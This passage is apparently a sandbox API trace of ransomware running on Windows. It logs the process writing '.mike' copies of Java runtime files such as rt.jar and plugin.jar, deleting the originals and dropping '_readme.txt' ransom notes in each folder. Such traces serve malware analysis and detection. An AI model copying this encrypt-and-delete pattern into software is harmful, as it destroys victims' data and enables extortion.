(x86)\\Java\\jre7\\lib\\plugin.jar", lpFilePart=0x0) returned 0x2f [0118.149] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.mike", lpFilePart=0x0) returned 0x34 [0118.150] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.mike", lpFilePart=0x0) returned 0x34 [0118.150] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar", dwFileAttributes=0x80) returned 1 [0118.150] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\plugin.jar")) returned 1 [0118.159] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0118.164] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0118.164] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.mike", lpFilePart=0x0) returned 0x37 [0118.165] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar", lpFilePart=0x0) returned 0x32 [0118.494] WriteFile (in: hFile=0x288, lpBuffer=0x21ccdfc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21ccdfc*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0118.495] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.mike", lpFilePart=0x0) returned 0x37 [0118.495] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.mike", lpFilePart=0x0) returned 0x37 [0118.495] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar", dwFileAttributes=0x80) returned 1 [0118.496] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\resources.jar")) returned 1 [0118.500] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0118.507] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0118.507] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0118.507] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar", lpFilePart=0x0) returned 0x2b [0125.683] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.686] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.693] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.696] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.702] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.730] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.732] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.734] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.736] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.738] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.740] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.741] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.743] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.745] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.747] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.749] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.752] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.754] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.756] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.758] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.759] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.762] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.763] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.765] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.767] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.769] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.771] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.773] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.784] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.791] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.793] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.795] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.797] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.799] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.804] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.806] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.807] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.809] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0125.811] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0126.979] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0127.612] WriteFile (in: hFile=0x288, lpBuffer=0x2204308*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2204308*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0127.614] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0127.614] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.mike", lpFilePart=0x0) returned 0x30 [0127.615] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar", dwFileAttributes=0x80) returned 1 [0127.615] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\rt.jar")) returned 1 [0127.628] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0127.637] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0127.637] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.637] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.638] CoTaskMemFree (pv=0x508980) [0127.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.638] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet", lpFilePart=0x0) returned 0x2b [0127.640] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0127.640] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0127.640] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.640] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.640] CoTaskMemFree (pv=0x508980) [0127.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.641] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm", lpFilePart=0x0) returned 0x28 [0127.646] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0127.647] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0127.647] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.647] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.648] CoTaskMemFree (pv=0x508980) [0127.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.648] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy", lpFilePart=0x0) returned 0x2b [0127.653] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0127.655] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.656] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.mike", lpFilePart=0x0) returned 0x3c [0127.656] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip", lpFilePart=0x0) returned 0x37 [0127.662] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.mike", lpFilePart=0x0) returned 0x3c [0127.662] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.mike", lpFilePart=0x0) returned 0x3c [0127.663] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip", dwFileAttributes=0x80) returned 1 [0127.663] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\ffjcext.zip")) returned 1 [0127.664] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\_readme.txt", lpFilePart=0x0) returned 0x37 [0127.669] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0127.669] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.669] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.669] CoTaskMemFree (pv=0x508980) [0127.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.669] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs", lpFilePart=0x0) returned 0x2f [0127.670] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0127.672] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.672] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.672] CoTaskMemFree (pv=0x508980) [0127.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.672] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext", lpFilePart=0x0) returned 0x28 [0127.678] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.679] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.mike", lpFilePart=0x0) returned 0x42 [0127.679] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar", lpFilePart=0x0) returned 0x3d [0127.688] WriteFile (in: hFile=0x288, lpBuffer=0x22f063c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22f063c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0127.688] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.mike", lpFilePart=0x0) returned 0x42 [0127.689] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.mike", lpFilePart=0x0) returned 0x42 [0127.689] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar", dwFileAttributes=0x80) returned 1 [0127.689] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\access-bridge-32.jar")) returned 1 [0127.691] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", lpFilePart=0x0) returned 0x34 [0127.693] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.693] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 